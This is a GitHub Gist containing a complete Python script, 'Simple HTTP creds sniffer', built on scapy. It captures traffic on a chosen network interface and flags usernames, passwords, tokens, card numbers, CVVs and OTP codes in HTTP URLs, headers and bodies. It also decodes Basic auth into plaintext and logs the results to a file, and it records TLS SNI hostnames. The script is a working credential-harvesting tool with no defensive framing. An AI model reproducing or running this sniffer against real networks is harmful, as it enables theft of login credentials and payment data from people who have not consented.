Last active
June 11, 2025 23:27
-
-
Save caueb/8794c0c7ccac51286527617cd0dd4bf1 to your computer and use it in GitHub Desktop.
Simple HTTP creds sniffer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import datetime | |
| import base64 | |
| import re | |
| from urllib.parse import unquote | |
| from scapy.all import sniff, Raw, IP, TCP | |
| from scapy.layers.http import HTTPRequest | |
| from scapy.layers.tls.handshake import TLSClientHello | |
| from scapy.layers.tls.record import TLS | |
| import warnings | |
| # === ANSI Colors === | |
| RED = "\033[91m" | |
| GREEN = "\033[92m" | |
| YELLOW = "\033[93m" | |
| CYAN = "\033[96m" | |
| RESET = "\033[0m" | |
| # === Credential Keywords === | |
| keywords = [ | |
| "username", "userid", "user_id", "login", "logon", "uname", "account", "userName", "UserID", | |
| "password", "pass", "passwd", "pwd", "secret", "pin", "passcode", "userpass", "user_pass", | |
| "email", "e-mail", "useremail", "emailaddress", "email_address", | |
| "token", "auth", "access_token", "id_token", "session", "jwt", "sso", "oauth", "csrf", "csrf_token", | |
| "creditcard", "card_number", "cardnum", "cvv", "cvc", "expdate", "expiry", | |
| "mobile", "mfa", "otp", "2fa", "twofa", "verification", "verify", "idnumber", "id_num", "nin", | |
| "credentials", "authdata", "logininfo", "signin", "signup", "register", | |
| "authorization", "bearer", "api_key", "apikey", "api-key" | |
| ] | |
| log_file = None | |
| processed_requests = {} # Simple deduplication cache | |
| import time | |
| def log(message): | |
| timestamp = datetime.datetime.now().strftime("[%d-%m-%Y %H:%M:%S]") | |
| full_message = f"{timestamp} {message}" | |
| print(full_message) | |
| if log_file: | |
| try: | |
| with open(log_file, "a") as f: | |
| f.write(strip_ansi(full_message) + "\n") | |
| except: | |
| pass | |
| def strip_ansi(text): | |
| import re | |
| return re.sub(r'\x1b\[[0-9;]*m', '', text) | |
| def keyword_match(data): | |
| data = data.lower() | |
| for keyword in keywords: | |
| if keyword in data: | |
| return keyword | |
| return None | |
| def extract_headers_and_body(raw_data): | |
| parts = raw_data.split("\r\n\r\n", 1) | |
| headers = parts[0] if len(parts) > 0 else "" | |
| body = parts[1] if len(parts) > 1 else "" | |
| return headers, body | |
| def is_http_packet(packet): | |
| if packet.haslayer(Raw): | |
| try: | |
| data = packet[Raw].load | |
| return b"HTTP" in data or data.startswith((b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS")) | |
| except: | |
| return False | |
| return False | |
| def sniff_packets(interface): | |
| web_ports = [ | |
| 80, 443, 8000, 8080, 8081, 8443, 9443, 8888, | |
| 3128, 3000, 5000 | |
| ] | |
| port_filter = " or ".join([f"tcp port {p}" for p in web_ports]) | |
| log(f"{CYAN}[*] Sniffing on interface: {interface}{RESET}") | |
| log(f"{CYAN}[*] Monitoring ports: {', '.join(map(str, web_ports))}{RESET}") | |
| sniff(iface=interface, store=False, prn=process_packet, filter=port_filter) | |
| def get_url(packet): | |
| try: | |
| host = packet[HTTPRequest].Host.decode() | |
| path = packet[HTTPRequest].Path.decode() | |
| dst_port = packet[TCP].dport | |
| # Include port if it's not default port 80 | |
| if dst_port != 80: | |
| return f"http://{host}:{dst_port}{path}" | |
| else: | |
| return f"http://{host}{path}" | |
| except: | |
| return None | |
| def process_packet(packet): | |
| if not packet.haslayer(IP) or not packet.haslayer(TCP): | |
| return | |
| src_ip = packet[IP].src | |
| dst_ip = packet[IP].dst | |
| dst_port = packet[TCP].dport | |
| # Skip duplicates and retransmissions - only process packets with data | |
| if not packet.haslayer(Raw) or len(packet[Raw].load) == 0: | |
| return | |
| # === Check Scapy's HTTP layer === | |
| if packet.haslayer(HTTPRequest): | |
| url = get_url(packet) | |
| if not url: | |
| url = f"http://{dst_ip}:{dst_port}" | |
| # Simple deduplication: check if we've seen this request recently | |
| current_time = time.time() | |
| request_key = f"{src_ip}->{url}" | |
| if request_key in processed_requests: | |
| if current_time - processed_requests[request_key] < 2: # 2 second window | |
| return # Skip duplicate request silently | |
| processed_requests[request_key] = current_time | |
| # Cleanup old entries (keep only last 100 requests) | |
| if len(processed_requests) > 100: | |
| oldest_entries = sorted(processed_requests.items(), key=lambda x: x[1])[:50] | |
| for key, _ in oldest_entries: | |
| del processed_requests[key] | |
| log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}") | |
| match_url = keyword_match(url) | |
| if match_url: | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_url}{RESET}") | |
| log(f"{YELLOW}Found In : URL{RESET}") | |
| log(f"{YELLOW}URL : {url}{RESET}") | |
| # Check HTTPRequest fields directly for known headers | |
| http_req = packet[HTTPRequest] | |
| # Check specific header fields that HTTPRequest parses - focus on auth-related ones | |
| header_fields = ['Authorization', 'Cookie', 'Proxy_Authorization', 'X_Csrf_Token'] | |
| for field_name in header_fields: | |
| if hasattr(http_req, field_name): | |
| field_value = getattr(http_req, field_name, None) | |
| if field_value: | |
| # Convert bytes to string if needed | |
| field_value_str = field_value.decode() if isinstance(field_value, bytes) else str(field_value) | |
| field_str = f"{field_name}: {field_value_str}" | |
| match_header = keyword_match(field_str) | |
| if match_header: | |
| # URL decode the header for better readability | |
| try: | |
| decoded_header = unquote(field_str) | |
| except: | |
| decoded_header = field_str | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_header}{RESET}") | |
| log(f"{YELLOW}Found In : Header{RESET}") | |
| log(f"{YELLOW}Header : {decoded_header}{RESET}") | |
| # Decode Authorization: Basic base64(user:pass) | |
| if field_name.lower() == "authorization" and field_value_str.startswith("Basic "): | |
| encoded = field_value_str[6:].strip() | |
| try: | |
| decoded = base64.b64decode(encoded).decode() | |
| log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}") | |
| except Exception as e: | |
| log(f"{YELLOW}Failed to decode Basic Auth: {e}{RESET}") | |
| # Check body for keywords if Raw layer exists | |
| if packet.haslayer(Raw): | |
| try: | |
| data = packet[Raw].load.decode(errors='ignore') | |
| # For HTTPRequest packets, Raw usually contains just the body | |
| match_body = keyword_match(data) | |
| if match_body: | |
| # URL decode the body data for better readability | |
| try: | |
| decoded_data = unquote(data) | |
| except: | |
| decoded_data = data | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_body}{RESET}") | |
| log(f"{YELLOW}Found In : Body{RESET}") | |
| log(f"{YELLOW}Raw : \n{decoded_data}{RESET}") | |
| except: | |
| pass | |
| # Return early to avoid duplicate processing in manual fallback | |
| return | |
| # === Manual fallback parsing === | |
| elif packet.haslayer(Raw): | |
| try: | |
| data = packet[Raw].load.decode(errors='ignore') | |
| if data.startswith(("GET", "POST", "PUT", "HEAD", "OPTIONS", "DELETE")): | |
| headers, body = extract_headers_and_body(data) | |
| request_line = headers.split("\r\n")[0] if headers else "" | |
| if len(request_line.split()) > 1: | |
| path = request_line.split()[1] | |
| url = f"http://{dst_ip}:{dst_port}{path}" | |
| else: | |
| url = f"http://{dst_ip}:{dst_port}" | |
| # Simple deduplication for manual parsing too | |
| current_time = time.time() | |
| request_key = f"{src_ip}->{url}" | |
| if request_key in processed_requests: | |
| if current_time - processed_requests[request_key] < 2: # 2 second window | |
| return | |
| processed_requests[request_key] = current_time | |
| log(f"{GREEN}[HTTP] {src_ip} -> {url}{RESET}") | |
| # Check URL for keywords in manual parsing | |
| match_url = keyword_match(url) | |
| if match_url: | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_url}{RESET}") | |
| log(f"{YELLOW}Found In : URL{RESET}") | |
| log(f"{YELLOW}URL : {url}{RESET}") | |
| for line in headers.split("\r\n")[1:]: | |
| match_header = keyword_match(line) | |
| if match_header: | |
| # URL decode the header for better readability | |
| try: | |
| decoded_line = unquote(line.strip()) | |
| except: | |
| decoded_line = line.strip() | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_header}{RESET}") | |
| log(f"{YELLOW}Found In : Header{RESET}") | |
| log(f"{YELLOW}Header : {decoded_line}{RESET}") | |
| # Decode Authorization: Basic base64(user:pass) | |
| if line.lower().startswith("authorization: basic"): | |
| encoded = line.split(" ", 2)[-1].strip() | |
| try: | |
| decoded = base64.b64decode(encoded).decode() | |
| log(f"{YELLOW}Decoded Basic Auth : {decoded}{RESET}") | |
| except Exception as e: | |
| log(f"{YELLOW}Failed to decode Basic Auth: {e}{RESET}") | |
| match_body = keyword_match(body) | |
| if match_body: | |
| # URL decode the body data for better readability | |
| try: | |
| decoded_body = unquote(body) | |
| except: | |
| decoded_body = body | |
| log(f"{RED}[!] Possible HTTP Credentials Found:{RESET}") | |
| log(f"{YELLOW}Source IP : {src_ip}{RESET}") | |
| log(f"{YELLOW}Keyword : {match_body}{RESET}") | |
| log(f"{YELLOW}Found In : Body{RESET}") | |
| log(f"{YELLOW}Raw : \n{decoded_body}{RESET}") | |
| except Exception as e: | |
| log(f"{YELLOW}[DEBUG] Fallback decode error: {e}{RESET}") | |
| # === TLS SNI parsing === | |
| elif packet.haslayer(TLS) and packet.haslayer(TLSClientHello): | |
| try: | |
| sni = packet[TLSClientHello].ext_servername.decode() | |
| log(f"{CYAN}[TLS] {src_ip} -> https://{sni} (Client Hello SNI){RESET}") | |
| except: | |
| pass | |
| # === Entry Point === | |
| if __name__ == "__main__": | |
| interface = None | |
| log_file = None | |
| if "-i" in sys.argv: | |
| try: | |
| interface = sys.argv[sys.argv.index("-i") + 1] | |
| except IndexError: | |
| print("[-] Missing interface after -i") | |
| sys.exit(1) | |
| else: | |
| print("Usage: sudo python3 sniffer.py -i <interface> [-o <output_file>]") | |
| sys.exit(1) | |
| if "-o" in sys.argv: | |
| try: | |
| log_file = sys.argv[sys.argv.index("-o") + 1] | |
| print(f"[*] Output will be logged to: {log_file}") | |
| except IndexError: | |
| print("[-] Missing filename after -o") | |
| sys.exit(1) | |
| try: | |
| warnings.filterwarnings("ignore", message="Unknown cipher suite.*") | |
| sniff_packets(interface) | |
| except KeyboardInterrupt: | |
| print(f"\n{CYAN}[!] Exiting...{RESET}") | |
| sys.exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment